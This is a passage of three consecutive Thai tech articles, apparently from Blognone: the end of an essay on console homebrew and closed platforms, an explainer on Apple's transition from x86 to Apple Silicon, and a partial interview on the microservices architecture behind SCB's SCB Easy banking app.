อีกหัวข้อหนึ่งที่มักถูกพูดถึงในวงการคอนโซล คือการรันแอพพลิเคชันที่ไม่ได้รับการอนุญาตจากผู้ผลิตเครื่องนั้นๆ ซึ่งมักถูกพัฒนาโดยนักพัฒนารายย่อย โดยแอพพลิเคชันกลุ่มนี้ถูกเรียกว่า Homebrew โดยทั่วไปแล้ว Homebrew มักจะไม่สามารถนำมาทำงานบนเครื่องต่างๆ เหล่านี้ได้ในทันที แต่ต้องผ่านกระบวนการบางอย่างที่ขัดต่อ EULA ของเฟิร์มแวร์เครื่องนั้นๆ และแม้ว่าในทางฝั่งผู้ผลิตมักจะมองว่า Homebrew ส่วนใหญ่มีวัตถุประสงค์เพื่อการเล่นเกมละเมิดลิขสิทธิ์ แต่ทางฝั่งผู้พัฒนา Homebrew กลับมองต่างออกไป โดยให้จุดยืนว่าผู้ใช้เสียเงินซื้อฮาร์ดแวร์มาแล้ว ควรจะมีสิทธิ์ที่จะใช้งานแอพพลิเคชันอะไรก็ได้บนฮาร์ดแวร์นั้นๆ ของตนเอง5 แม้ว่าทางฝั่งผู้ผลิตอย่างโซนี่จะเคยออกมาชมว่ามี Homebrew บนเครื่อง PSP มากมายที่น่าสนใจและสร้างสรรค์6 แต่ปัญหาเรื่องการละเมิดลิขสิทธิ์ก็ยังเป็นเหตุผลใหญ่ที่ทำให้โซนี่ยังพยายามขัดขวางการ Homebrew7 ซึ่งหากมองในฝั่งของผู้ผลิตที่อาจไม่ได้ขายคอนโซลในราคาที่มีกำไรสูงพอ และหวังจะได้กำไรจากค่าลิขสิทธิ์ของเกม แน่นอนว่าเป็นเรื่องที่ยอมรับไม่ได้และทำให้ผู้ผลิตเสียประโยชน์อย่างมหาศาล คำถามจึงอยู่ที่ว่า ผู้ผลิตฮาร์ดแวร์มีสิทธิ์ที่จะขายฮาร์ดแวร์ในราคาถูก และมีเงื่อนไขบางอย่างเพื่อหารายได้เพิ่มเติมภายหลังหรือไม่ ในลักษณะคล้ายๆ กับการขายหรือแจกเครื่องพิมพ์ในราคาถูก โดยหวังจะหารายได้เพิ่มเติมจากการขายตลับหมึกในอนาคต จึงต้องพยายามกีดกันการใช้หมึกพิมพ์ที่ไม่ใช่ของตนเองทุกวิถีทางเพื่อรักษาผลประโยชน์ไว้ นอกจากนี้แล้วในฐานะผู้ผลิตฮาร์ดแวร์ที่สร้างแพลตฟอร์มขึ้นมา ย่อมยอมรับไม่ได้ด้วยหากแพลตฟอร์มของตนถูกนำไปใช้บนฮาร์ดแวร์อื่นๆ อย่างสารพัดอีมูเลเตอร์ต่างๆ ที่เราคงคุ้นเคยกันดี แม้ว่าสุดท้ายแล้วโซนี่จะพ่ายแพ้อย่างราบคาบจากการพยายามฟ้อง Bleem! เมื่อปี 19998 ที่ผลิตอีมูเลเตอร์ของเครื่อง PlayStation บน PC แต่ประเด็นหลักที่ทำให้ Bleem! ชนะคือการทำวิศวกรรมย้อนกลับโดยไม่ได้ละเมิดลิขสิทธิ์ใดๆ ในตัวซอฟต์แวร์ของ Sony ซึ่งอาจจะต่างกับกรณีของการลง Mac OS X บนเครื่องอื่นๆ ที่ไม่ใช่ของแอปเปิลไปเสียหน่อย แต่ก็แสดงให้เห็นถึงมูลค่าของแพลตฟอร์มที่อยู่เหนือตัวฮาร์ดแวร์ของ PlayStation ดังนั้นหากเราย้อนกลับมาดูที่ iPhone หรือแม้แต่สารพัดเครื่อง Mac เองก็ตาม ก็ล้วนแล้วแต่เป็นฮาร์ดแวร์ที่ผูกติดกับแพลตฟอร์ม และทุกอย่างที่แอปเปิลทำก็ไม่ใช่เรื่องใหม่ การควบคุมซอฟต์แวร์บน App Store เพื่อรักษามาตรฐานและประสบการณ์ของผู้ใช้บนแฟลตฟอร์ม การปกป้องผู้ใช้จากเนื้อหาที่ไม่เหมาะสม การควบคุมการแจกจ่ายซอฟต์แวร์เพื่อป้องกันการละเมิดลิขสิทธิ์และรักษารายได้จากส่วนแบ่ง ไปจนถึงการป้องกันไม่ให้ฮาร์ดแวร์อื่นๆ อย่างเครื่องจาก Psystar หรือ Palm Pre มาใช้ประโยชน์จากแพลตฟอร์มที่ตนเองสร้างขึ้น ทั้งหมดนี้เคยเกิดขึ้นในอดีต และยังถูกถกเถียงมาจนปัจจุบัน ในทางกฎหมาย คงเป็นเรื่องของผลประโยชน์ที่ต้องรอให้เหล่านักการเมืองและนักกฎหมายในฐานะผู้จัดสรรผลประโยชน์ในสังคมควรจะต้องหาข้อสรุปที่เหมาะสมต่อไป แต่ในทางปฏิบัติ ก็เหลือแค่เพียงว่าทางกลุ่มแพลตฟอร์มปิดอย่างเกมคอนโซลหรือ iPhone จะรักษาความพึงพอใจของผู้ใช้และคู่ค้าต่างๆ ไว้ได้หรือไม่ ในขณะที่แพลตฟอร์มเปิดอย่าง Windows หรือ Android จะรักษาความเรียบร้อยของแพลตฟอร์มตนเองไว้พร้อมๆ กับอิสรภาพของผู้ใช้และนักพัฒนา ต้องรอดูกันต่อไปครับ
# เจาะลึกรายละเอียด Apple Silicon เมื่อ Mac เปลี่ยนผ่านจาก x86 สู่ซีพียูออกแบบเอง ข่าวใหญ่ของวงการไอทีสัปดาห์นี้ย่อมเป็นเรื่อง [แอปเปิลย้าย Mac จากสถาปัตยกรรม x86 มาเป็น ARM](https://www.blognone.com/node/117067) โดยเปลี่ยนมาใช้ซีพียูออกแบบเองที่มีชื่อเรียกรวมๆ ว่า Apple Silicon (ยังไม่มีข้อมูลของซีพียูตัวที่จะใช้จริงๆ) ประกาศของแอปเปิลทำให้เกิดคำถามตามมามากมาย ซึ่งแอปเปิลเองก็ตอบคำถาม (บางส่วน) ไว้ในเซสซันย่อยของงาน WWDC 2020 เราจึงรวบรวมรายละเอียดมาให้อ่านกันครับ ### ทำไมต้องย้ายจาก x86 เป็น ARM แอปเปิลอธิบายเรื่องนี้ไว้ใน Keynote ตอนเปิดงาน WWDC 2020 ว่าเหตุผลที่เปลี่ยนจากซีพียูสถาปัตยกรรม x86 มาเป็น ARM มีทั้งหมด 3 ประการ ได้แก่ 1. ประสิทธิภาพต่อพลังงาน 2. ฟีเจอร์ด้านฮาร์ดแวร์ 3. compatibility ของฮาร์ดแวร์ทั้งหมดของบริษัท ถึงแม้แอปเปิลสร้างชื่อขึ้นมาจากคอมพิวเตอร์ตระกูล Macintosh มายาวนานหลายสิบปี แต่ในรอบ 10 ปีให้หลังก็ปฏิเสธไม่ได้ว่าพระเอกกลายเป็น iPhone ที่มียอดขายสูงกว่ากันหลายเท่า จนหลายคนอาจรู้สึกว่า Mac ถูกทอดทิ้ง ซึ่งก็เป็นแบบนั้นจริงๆ เพราะแอปเปิลหันไปโฟกัสที่ iPhone มากกว่าจริงๆ ### ประสิทธิภาพต่อพลังงาน การที่แอปเปิลหันไปโฟกัสที่ iPhone (และขยายมายังอุปกรณ์ข้างเคียงอย่าง iPad และ Apple Watch) ทำให้นวัตกรรมด้านฮาร์ดแวร์บน iPhone พัฒนาไปอย่างก้าวกระโดด โดยเฉพาะตัว SoC ตระกูล Apple A ที่ต้องยอมรับว่าแอปเปิลทำได้ดีมาก ในแง่ประสิทธิภาพก็สามารถเอาชนะคู่แข่งรายอื่นในท้องตลาด (เช่น Snapdragon) ได้สบายๆ พัฒนาการที่ต่อเนื่องของชิปตระกูล Apple A (ที่สามารถ "เป็นไปได้" ด้วยปัจจัยทางเศรษฐกิจคือยอดขาย iPhone/iPad รวมกันหลักพันล้านเครื่อง) ทำให้มิติเรื่อง "ประสิทธิภาพต่อพลังงาน" (ไม่ใช่ "ประสิทธิภาพ" เพียงอย่างเดียวที่ x86 ยังทำได้ดีกว่า) ดีขึ้นมากจนถึงระดับที่สามารถใช้ทดแทนซีพียูเดสก์ท็อปแล้ว จากแผนภาพของแอปเปิลเองก็แสดงให้เห็นว่าชิป Apple Silicon เหนือกว่าชิปในท้องตลาด ตรงที่มีประสิทธิภาพใกล้เคียงกับเดสก์ท็อป ในอัตราการใช้พลังงานใกล้เคียงกับโน้ตบุ๊ก (ในแง่การใช้งานก็ตีความได้ว่า MacBook จะมีแบตเตอรี่ที่ยาวนานขึ้นมาก ในประสิทธิภาพเท่าเดิม) นอกจากเรื่องประสิทธิภาพต่อวัตต์แล้ว ซีพียูสาย ARM ที่ใช้กันบนมือถือยุคหลังๆ ยังมีแนวคิดเรื่อง asymmetric cores ที่มีคอร์หลายรูปแบบสำหรับงานแต่ละประเภท (ที่เราคุ้นกันในชื่อ big.LITTLE บ้าง คอร์แบบ 4+4 หรือ 6+2 บ้าง) ทำให้ประหยัดพลังงานมากกว่าซีพียูแบบ x86 ที่ทุกคอร์มีสมรรถนะเท่ากัน แอปเปิลจึงให้เหตุผลว่าการเปลี่ยนมาใช้ซีพียูที่ออกแบบเอง จึงมีประสิทธิภาพต่อพลังงานดีกว่าเพราะปัจจัยนี้ด้วย งานเล็กๆ ก็ให้คอร์เล็กๆ ทำ ไม่ต้องเปลืองไฟใช้คอร์ใหญ่ทำแบบ x86 ในปัจจุบัน (หมายเหตุ: [อินเทลเพิ่งเปิดตัว Lakefield ที่ใช้แนวคิดคอร์เล็ก-ใหญ่](https://www.blognone.com/node/116832) แต่คงต้องรออีกสักพักใหญ่ๆ กว่าจะได้เห็นการใช้งานจริง) ตรงนี้คงต้องรอชิป Apple Silicon วางขายจริงๆ ภายในปีนี้ว่าทำได้ตามที่โม้ไว้แค่ไหน แต่จาก[ฮาร์ดแวร์ทดสอบของแอปเปิลเอง (DTK) ที่ใช้ A12Z SoC ตัวเดียวกับใน iPad Pro 2020](https://www.blognone.com/node/117067) ก็คิดว่าผลิตภัณฑ์จริงไม่น่าจะต่างกันมากนักในเชิงสถาปัตยกรรม ### เปลี่ยนเพราะฟีเจอร์จาก SoC ที่ออกแบบเอง นอกจากปัจจัยเรื่องประสิทธิภาพ/พลังงานแล้ว วงการสมาร์ทโฟนและอุปกรณ์พกพาในช่วงหลังๆ ยังมีชิปหรือนวัตกรรมอื่นๆ ที่เข้ามาทำงานเฉพาะทางบางอย่าง เช่น ชิปถอดรหัสวิดีโอ ชิปเร่งความเร็วคริปโต ชิปประมวลผล AI ฯลฯ ดังที่เห็นในรูปแรกสุดของบทความนี้ แอปเปิลอธิบายว่าเครื่อง Mac ในปัจจุบันประกอบด้วย CPU+GPU ตามมาตรฐาน และชิปพิเศษที่ออกแบบเองคือ[ชิป T2](https://www.blognone.com/node/106501) ที่เอาไว้เก็บข้อมูลลับ (secure enclave) และช่วยประมวลผลงานเฉพาะทางบางอย่าง เช่น สัญญาณภาพหรือความเคลื่อนไหว แผนการของแอปเปิลคือต้องการรวมทุกอย่างไว้บน SoC ชิ้นเดียว เพื่อประโยชน์ในเชิงสถาปัตยกรรมฮาร์ดแวร์ (เท่าที่ยกตัวอย่างมาคือการทำ unified memory ไม่ต้องแยกแรม CPU/GPU แล้วส่งข้อมูลวิ่งไปมา) และต่อยอดฟีเจอร์เฉพาะทาง (เช่น ตัวถอดรหัสวิดีโอ หรือชิปประมวลผล AI) โดยนำชิปที่มีอยู่แล้วบน iPhone/iPad มาใช้ในเครื่อง Mac ด้วย ไม่ต้องลงทุนใหม่ ฟีเจอร์อื่นที่แอปเปิลพูดถึงคือ ความปลอดภัยที่ระดับฮาร์ดแวร์ ซึ่งมีอยู่แล้วบน iPhone เช่น การคุ้มครองเคอร์เนล ไม่อนุญาตให้รันส่วนขยายของเคอร์เนล (kernel extension) โดย Mac ยุคใหม่จะต้องเขียนไดรเวอร์ผ่าน [DriverKit](https://developer.apple.com/documentation/driverkit) ที่อยู่ใน user space แทน Device isolation การแยก input–output memory management unit (IOMMU) สำหรับฮาร์ดแวร์แต่ละชิ้น ไม่ต้องมาใช้ IOMMU เดียวกัน ป้องกันสถานะของหน่วยความจำเป็น write (W) หรือ execute (X) พร้อมกัน ช่วยแก้ปัญหาเรื่องความปลอดภัยของแรม แต่อาจมีปัญหากับ JIT compiler บางตัวที่ต้องใช้งานฟีเจอร์นี้ ซึ่งแอปเปิลแก้ปัญหาด้วยการสลับสถานะ R/X ให้อย่างรวดเร็วแทน ถ้าลองสังเกตประกาศของแอปเปิลแทบไม่มีคำว่า "เปลี่ยนเป็น ARM" เลยนะครับ แอปเปิลใช้คำว่า "Apple Silicon" ทั้งหมด เพราะความหมายของมันคือการเปลี่ยนจากซีพียู x86 ทั่วไป (Intel) มาเป็นซีพียูที่แอปเปิลออกแบบเอง (ได้ประโยชน์จากเรื่องพลังงาน+ฟีเจอร์) ไม่ใช่การเปลี่ยนมาใช้ซีพียู ARM ทั่วไป (ที่ได้ประโยชน์เฉพาะเรื่องพลังงานอย่างเดียว) *หมายเหตุ:* เอาเข้าจริงแล้ว ไมโครซอฟท์ก็มีแนวทางคล้ายกัน เห็นได้จาก [Surface Pro X ที่ชิปพิเศษ Microsoft SQ1](https://www.blognone.com/node/112316) ที่ออกแบบร่วมกับ Qualcomm เพียงแต่ไมโครซอฟท์ไม่ได้ลงทุนกับซีพียูของตัวเองมายาวนานเท่ากับแอปเปิล ผลที่ได้รับกลับคืนมาจึงไม่ชัดเจนเท่า ### ความเข้ากันได้ของ macOS และ iOS ปัจจัยสุดท้ายคือเรื่อง compatibility เมื่อแพลตฟอร์มฮาร์ดแวร์ทั้งหมดของแอปเปิลกลายเป็น ARM การพอร์ตโค้ด ฟีเจอร์ หรือแอพจาก iOS (ซึ่งปัจจุบันถือเป็นแพลตฟอร์มที่ใหญ่กว่า macOS มากๆ ในแง่จำนวนผู้ใช้และจำนวนแอพ) จึงทำได้ง่ายขึ้นมาก แอปเปิลเองก็ไม่ต้องมาคอยพะวง ดูแลแยก 2 สถาปัตยกรรมขนานกันไป (และทำให้ Mac ถูกทอดทิ้งมานานเพราะ iOS สำคัญกว่า ได้ทรัพยากรไปมากกว่า) พอยุบเหลือสถาปัตยกรรมเดียว ฟีเจอร์ของ Mac ย่อมใกล้เคียงกับ iOS มากขึ้น หรืออย่างน้อยก็ไม่ถูกทิ้งห่างเหมือนเดิม ### ขั้นตอนการเปลี่ยนผ่าน การเปลี่ยนผ่านจาก x86 มาสู่ ARM รอบนี้ไม่ใช่เรื่องเจ็บปวดมากนัก เพราะแอปเปิลมีประสบการณ์ตรงจากการเปลี่ยน PowerPC มาเป็น x86 เมื่อ 15 ปีก่อน ขั้นตอนการเปลี่ยนผ่านจึงไม่ต่างกัน แนวทางเปลี่ยนผ่านของแอปเปิลมี 2 แบบขนานกันไปเช่นเดิม ได้แก่ - Universal Binary การคอมไพล์โปรแกรมเป็นทั้ง x86 และ ARM รองรับฮาร์ดแวร์ทั้งสองแบบ - Rosetta การแปลงไบนารี ARM ไปรันบนฮาร์ดแวร์ x86 จำลอง แอปเปิลย่อมอยากให้นักพัฒนาแอพเลือกใช้วิธี Universal มากกว่า เพราะคอมไพล์เป็น ARM แบบเนทีฟโดยตรง ซึ่งต้องอาศัยนักพัฒนาปรับแก้แอพใหม่ด้วย [Xcode 12 ขึ้นไป](https://www.blognone.com/node/117091) แต่ถ้าไม่ได้จริงๆ (เช่น ซอฟต์แวร์ตัวนั้นไม่พัฒนาต่อแล้วแต่ยังมีคนใช้) ก็ยังมีทางออกคือ Rosetta แม้ประสิทธิภาพจะด้อยลงไปบ้าง ผมคิดว่าการเปลี่ยนผ่านของแอปเปิลรอบนี้น่าจะราบรื่นกว่ารอบที่แล้วมาก เพราะแอปเปิลมีประสบการณ์แล้ว รู้ว่าอุปสรรคอยู่ตรงไหน, คอมพิวเตอร์ยุค 15 ปีให้หลังพัฒนาขึ้นมาก มีทรัพยากรเหลือเฟือสำหรับการรันอีมูเลเตอร์ และที่สำคัญคือตัวสถาปัตยกรรม ARM มีความต่างจาก x86 น้อยกว่า x86 ต่างจาก PowerPC ตัวอย่างที่แอปเปิลยกมาคือลำดับการวางตำแหน่งเลข (endian) ของ x86 เหมือนกับ ARM ทำให้ไม่ต้องมีปัญหาเรื่องสลับตำแหน่งไบต์เหมือนตอนย้ายจาก PowerPC มาเป็น x86 แต่การเปลี่ยนผ่านก็ย่อมไม่ราบรื่นทั้งหมด 100% เพราะความแตกต่างระหว่างสถาปัตยกรรมย่อมมีอยู่ เช่น Rosetta ไม่รองรับชุดคำสั่งประมวลผลเวกเตอร์ (AVX) ที่มีในซีพียูอินเทล (เพราะ ARM ไม่มีชุดคำสั่งนี้โดยตรง) หรือขนาดของ page file ที่ไม่เท่ากัน (4kB บนซีพียูอินเทล, 16 kB บนซีพียูแอปเปิล) คำแนะนำของแอปเปิลคือ พยายามอย่าใช้โค้ดที่ระบุสถาปัตยกรรมของซีพียูโดยตรง (เช่น กำหนดเงื่อนไข if ตามสถาปัตยกรรม x86/arm64) หรือเรียกใช้ชุดคำสั่งของซีพียูโดยตรง (เช่น ประมวลผลคำสั่งทางคณิตศาสตร์ด้วย AVX) โดยให้ทำงานผ่านเฟรมเวิร์คของ OS แทน แอปเปิลบอกว่าพยายามแก้ปัญหาการข้ามสถาปัตยกรรมด้วยเฟรมเวิร์คให้มากที่สุด เช่น งานกราฟิกให้รันผ่าน Metal หรืองานปัญญาประดิษฐ์ให้เรียก Core ML แล้วเฟรมเวิร์คจะไปจัดการเรื่องสถาปัตยกรรมซีพียูให้เอง โดยที่นักพัฒนาไม่ต้องสนใจว่าข้างใต้เป็น x86 หรือ ARM เพราะช่วงแรกๆ จะต้องรองรับทั้งสองสถาปัตยกรรมอยู่ดี อย่างไรก็ตาม ปัญหาที่น่าจะเจอแน่ๆ คือการเรียกใช้ไลบรารีที่คอมไพล์เป็นไบนารีมาแล้ว (pre-compiled binary) ซึ่งนักพัฒนาอาจไม่มีทางเลือกมากนัก ในช่วงแรกๆ คงไม่มีไบนารีเวอร์ชัน arm64 ให้ใช้งาน ตรงนี้คงต้องอาศัยระยะเวลาในการค่อยๆ เปลี่ยนผ่านไลบรารีไปสู่ ARM สุดท้าย แอปเปิลย้ำว่าการพอร์ตแอพจาก x86 เป็น ARM จำเป็นต้องรันทดสอบบนฮาร์ดแวร์ Apple Silicon จริงๆ เสมอ แปลว่านักพัฒนาควรต้องหาฮาร์ดแวร์มาทดสอบกัน ไม่ว่าจะเป็นชุด DTK ในช่วงแรก (ที่มีค่ายืม 500 ดอลลาร์) หรือซื้อ Mac เครื่องใหม่ที่เป็น Apple Silicon เมื่อวางขายจริงแล้ว กล่าวโดยสรุปคือ - การเปลี่ยนผ่านน่าจะค่อนข้างราบรื่น สำหรับแอพทั่วๆ ไปที่ไม่มีชุดคำสั่งพิเศษที่โยงกับซีพียู - แอพเฉพาะทางหน่อยหรืออิงกับซีพียูมากหน่อย เช่น เกม แอพสายวิทยาศาสตร์ หรือแอพที่เก่ามากๆ ไม่ได้อัพเดตต่อแล้ว ก็คงมีปัญหาอยู่ดี - แอปเปิลย่อมจับมือกับผู้พัฒนาแอพสำคัญๆ อย่าง Microsoft Office หรือ Adobe ดังที่เห็นเดโมใน Keynote - รายละเอียดของ Apple Silicon ยังมีไม่เยอะนักในตอนนี้ คงต้องรอช่วงที่สินค้าจริงเปิดตัว - การเปลี่ยนผ่านย่อมใช้เวลาพอสมควร ใครที่มีประสบการณ์ซื้อ Mac Intel ในช่วงแรกๆ มาแล้วคงรู้ซึ้งกันดีว่า "รอนานอีกสักหน่อยแล้วค่อยซื้อของใหม่จะดีกว่า" ### ข้อมูลเพิ่มเติม นักพัฒนาแอพสาย Mac สามารถหาข้อมูลเพิ่มเติมได้จาก - [เซสชัน Explore the new system architecture of Apple Silicon Macs](https://developer.apple.com/videos/play/wwdc2020/10686/) จาก WWDC 2020 - [เซสชัน Port your Mac app to Apple Silicon](https://developer.apple.com/videos/play/wwdc2020/10214) จาก WWDC 2020 - [หน้ารวมเอกสาร Apple Silicon บนเว็บไซต์ Apple Developer](https://developer.apple.com/documentation/apple_silicon/) - [บทความ Porting Your macOS Apps to Apple Silicon](https://developer.apple.com/documentation/xcode/porting_your_macos_apps_to_apple_silicon)
# คุยกับไทยพาณิชย์ เปิดดูสถาปัตยกรรมเบื้องหลัง SCB Easy ที่เขียนใหม่ในเวลา 10 เดือน ข่าวที่สร้างกระแสฮือฮาให้วงการธนาคารในรอบเดือนที่ผ่านมา คือ[การเปิดตัวแอพ SCB Easy เวอร์ชันใหม่](https://www.blognone.com/node/94885) ที่มีจุดขายคือปรับหน้าตาโฉมใหม่ และการกดเงินจากตู้เอทีเอ็มแบบไม่ต้องใช้บัตร แต่ในงานแถลงข่าวเปิดตัวแอพ SCB Easy ทางธนาคารไทยพาณิชย์ไม่ได้พูดแต่เรื่องตัวแอพอย่างเดียว เพราะพูดถึง "สถาปัตยกรรม" ฝั่งเซิร์ฟเวอร์ที่ทำงานอยู่เบื้องหลัง ระบบฝั่งเซิร์ฟเวอร์ตัวนี้ถูกเขียนขึ้นมาใหม่ทั้งหมด และใช้แนวทางแบบ microservices ที่กำลังได้รับความนิยมในบริษัทไอทีสมัยใหม่ (แนวทางนี้เอามาจาก Netflix) ทาง Blognone จึงไม่พลาดโอกาสที่จะขอสัมภาษณ์ SCB ในเรื่องนี้ และเราได้คุยกับ**คุณธนา โพธิกำจร Head of Digital Banking** ผู้ที่ขึ้นเวทีพรีเซนต์สถาปัตยกรรมนี้ในงานแถลงข่าวนั่นเอง ### สถาปัตยกรรมเดิมของ SCB Easy ใช้มานาน 15 ปี!! คุณธนา เริ่มจากเล่าว่าตัวสถาปัตยกรรมเบื้องหลังเว็บไซต์ SCB Easy ซึ่งเป็น internet banking รายแรกๆ ถูกพัฒนามาตั้งแต่ปี 2001-2002 โดยเริ่มจากการเป็น web frontend ที่เขียนด้วย ASP ที่ผ่านมา 15 ปี ระบบตัวนี้ไม่เคยถูกเปลี่ยนแปลงใหญ่เลย มีแต่โมกันแล้วโมกันอีก (บวกด้วยอัพเกรดเป็น [ASP.NET](http://asp.net/) เท่านั้น) แถมตัวมันเองใช้โครงสร้างแบบ monolithic การแก้ไขอะไรก็ตามจึงเป็นเรื่องยากมาก พอช่วงหลัง ธนาคารออนไลน์เริ่มได้รับความนิยมมากขึ้น ปริมาณทราฟฟิกคนเข้าเว็บก็เยอะขึ้น โดยเฉพาะช่วงสิ้นเดือน ระบบเริ่มรองรับไม่ไหวและมี downtime บ่อยขึ้นเรื่อยๆ ทุกคนในทีมก็มองว่าการจูนระบบเดิมให้รองรับปริมาณทราฟฟิกใหม่ เริ่มเป็นไปไม่ได้แล้ว จึงมองถึงการเขียนใหม่ การเขียนใหม่ก็เริ่มขึ้นตั้งแต่ปลายปีที่แล้วนี้เอง มาถึงตอนนี้ใช้เวลาเพียง 10 เดือนเท่านั้น เรียกว่าเป็นภารกิจที่ท้าทายมาก ในการสร้างระบบ backend ขึ้นมาใหม่ทั้งหมด ในระยะเวลาที่สั้นขนาดนี้ ### SCB Easy Platform ตามแนวทางเดียวกับ Netflix โจทย์ของการออกแบบ SCB Easy Platform ไม่มีอะไรสำคัญไปกว่า "ความเรียบง่าย" ทีมงานต้องการให้มันสะอาดที่สุดเท่าที่เป็นไปได้ ส่วนปรัชญาข้ออื่นที่นำมาใช้ก็คือ "microservices" ที่แยกบริการย่อยๆ ออกจากกัน เพื่อให้แก้ไขได้เฉพาะส่วนโดยไม่กระทบส่วนอื่น และรองรับการขยายตัวของทราฟฟิกการใช้งานในอนาคต ต้นแบบของ SCB Easy Platform มาจากสถาปัตยกรรมของ Netflix ที่เปิดซอร์สต่อสาธารณะ ซึ่งหลายองค์กรก็นำแนวทางของ Netflix มาใช้เช่นกัน คุณธนา บอกว่าเนื่องจากเป็นการออกแบบสถาปัตยกรรมใหม่หมด และมีต้นแบบที่ใช้งานได้ดีอยู่แล้ว จึงพยายามยึดแนวทางให้สถาปัตยกรรม "สวย" ที่สุดเอาไว้ตั้งแต่แรก ### จาก Frontend เข้าสู่ระบบภายใน ฝั่งของ frontend ใช้[เทคโนโลยี Experience API ของบริษัท Backbase](https://backbase.com/) ที่ธนาคารทั่วโลกใช้กันสำหรับเป็น Frontend Content Management ส่วนตัวไคลเอนต์ก็เขียนขึ้นเอง มีทั้งเว็บและแอพ บทเรียนของ SCB ในการสร้างแอพ SCB Easy คือต้องหาความสมดุลระหว่างการเขียนแอพแบบเนทีฟ และการใช้ webview เข้าช่วย จากประสบการณ์คือเนทีฟดีกว่าเว็บมาก เพราะการทำเว็บให้เนียนสวยเท่าเนทีฟเป็นเรื่องยากกว่ามาก แต่การใช้เนทีฟก็มีข้อเสียคือทำให้แอพมีขนาดบวมขึ้นเรื่อยๆ ถ้าเรายัดทุกอย่างลงไป ดังนั้นอะไรที่ใช้ไม่บ่อยนัก นานๆ ใช้ที สร้างเป็นเว็บดีกว่า เรื่อง UI ของแอพที่มีทั้งคนชอบและไม่ชอบ เรื่องนี้แยกเป็น 2 แนวทางตั้งแต่ช่วงการออกแบบแล้ว คนที่ใช้ฟีเจอร์ทำธุรกรรมบ่อยๆ จะรู้สึกว่ารกไปหน่อย ทีม UX เองก็อยากให้ลูกค้าทำคำสั่งในแอพให้เสร็จเร็วๆ แต่ก็สวนทางกับยุทธศาสตร์ของธนาคารที่อยากเป็นมากกว่าธนาคาร คำถามในเชิงการออกแบบคือจะหาจุดสมดุลอย่างไร เสียงตอบรับหลังแอพออกไปแล้วคือกลุ่ม power user บ่นว่าใช้งานยากขึ้น แต่ที่ผิดคาดคือกลุ่มลูกค้าทั่วไปกลับชอบ เพราะเกิดความสนใจ เข้าไปดูได้มากขึ้นว่าแอพของธนาคารทำอะไรได้เยอะกว่าที่คิดมากด้วย ### API Gateway เปิดการเชื่อมต่อสู่ภายนอก แพลตฟอร์มตัวนี้มี API Gateway เพื่อให้ระบบ backend สามารถสื่อสารกับ frontend ใดๆ ก็ได้ รวมถึงการเชื่อมต่อจากพาร์ทเนอร์ หรือสตาร์ตอัพสายฟินเทค เข้ามาเรียกใช้ API ได้ด้วย SCB ให้ความสำคัญกับการเปิด API มาก สังเกตได้จากแอพ SCB Easy ตัวใหม่ใช้การออกแบบแนว tile ที่มีไอคอนเพิ่มขึ้นได้เรื่อยๆ เพื่อเปิดให้พาร์ทเนอร์สามารถเข้ามานำเสนอบริการของตัวเองต่อลูกค้าของ SCB Easy จำนวน 4-5 ล้านคนได้จากตัวแอพเลย ตอนนี้ frontend ของ SCB เองก็จะเรียกข้อมูลต่างๆ ในฝั่ง backend ผ่าน public API กันอย่างเสมอภาค ทัดเทียมกับแอพภายนอกที่มาเชื่อมต่อ ไม่มีท่าพิเศษให้กับแอพของ SCB โดยเฉพาะ เพื่อสร้างฐานตัว API ให้มั่นคงสำหรับอนาคตเมื่อเปิดการเชื่อมต่อให้คนนอก ### Hyper-scalable รองรับการขยายตัวในอนาคต ฝั่งของตัวระบบหลัก ที่ออกแบบเป็น microservices ตามแนวทางสมัยใหม่ ก็มีโจทย์ว่าทำอย่างไรจะรองรับการขยายตัวแบบ hyperscale ในอนาคตได้ ตรงนี้ทีม SCB ใช้โซลูชันของ Netflix สองตัวคือ Edge Service ที่เอาไว้กระจายงาน (ใช้ [Zuul](https://github.com/Netflix/zuul)) ส่วนการจัดการโครงสร้างพื้นฐานใช้ [Eureka](https://github.com/Netflix/eureka) สำหรับ provisioning และ load balancing บทเรียนของ SCB พบว่าการออกแบบ microservice ดูแลง่ายจริง แต่กินทรัพยากรเยอะ ดังนั้นจะต้องเตรียมจำนวนเครื่องไว้ให้ดี โครงสร้างพื้นฐานทั้งหมด SCB ดูแลโฮสต์เอง ไม่ได้อยู่บนคลาวด์ โดยใช้คลาวด์เฉพาะงานส่วน dev/testing environment เท่านั้น ส่วนงานอื่นๆ อย่างการทำ logging ใช้ [Elasticsearch](https://www.elastic.co/) และการมอนิเตอร์การใช้งานใช้ Firebase ของกูเกิล โดยระวังเรื่องการไม่ส่งข้อมูลที่ระบุตัวลูกค้าออกไปยังกูเกิล เพราะระวังเรื่องการกำกับดูแลจากธนาคารแห่งประเทศไทย ### Intelligence ส่วนงานวิเคราะห์ข้อมูล อีกส่วนที่ SCB ให้ความสำคัญคือการวิเคราะห์ข้อมูล เรื่องนี้เป็นนโยบายที่มาจากซีอีโอโดยตรง ว่าอยากให้ธนาคารมีวัฒนธรรมที่ตัดสินใจบนพื้นฐานของข้อมูล (data-driven culture) ปัญหาในเชิงเทคนิคคือธนาคารมีระบบไอทีหลากหลาย ข้อมูลเก็บอยู่คนละที่ ทางออกจึงเป็นแนวคิด data lake คือเทข้อมูลทั้งหมดมาเก็บรวมกันตรงกลาง โซลูชันที่ใช้ก็เป็น Hadoop ตามมาตรฐานของวงการ (ใช้ของ Cloudera) จากนั้นก็ใส่ตัววิเคราะห์ข้อมูลเข้ามาอีกหลายตัว เช่น Splunk ส่วนเป้าหมายของการวิเคราะห์ข้อมูล อย่างในแอพ SCB Easy ควรจะวิเคราะห์และพยากรณ์ได้ว่า ลูกค้าจะอยากทำอะไรเป็นลำดับต่อไป เราควรนำเสนอให้ลูกค้าได้เลย ไม่ใช่ว่าให้ลูกค้าต้องมานั่งหาเอง ตอนนี้ก็เริ่มทดสอบฟีเจอร์นี้เป็นการภายในบ้างแล้ว ### กระบวนการทำงานก็สำคัญไม่แพ้กัน นอกจากเรื่องสถาปัตยกรรมแล้ว การทำงานของคนในทีมก็สำคัญไม่แพ้กัน ตอนแรกทาง SCB อยากทำ agile เหมือนคนอื่นๆ แต่พบว่าโครงการนี้ใหญ่มาก เพราะต้องเขียนระบบใหม่หมด ในเวลาที่สั้นมากคือ 10 เดือน การเปลี่ยนวิธีทำงานพร้อมกับเปลี่ยนสถาปัตยกรรมครั้งใหญ่ คงต้องเลือกอย่างใดอย่างหนึ่ง ช่วงแรกๆ ของโครงการก็นำ agile เข้ามาใช้งาน ทีมงานก็เครียดกันมาก เพราะต้องเปลี่ยนวิธีทำงาน 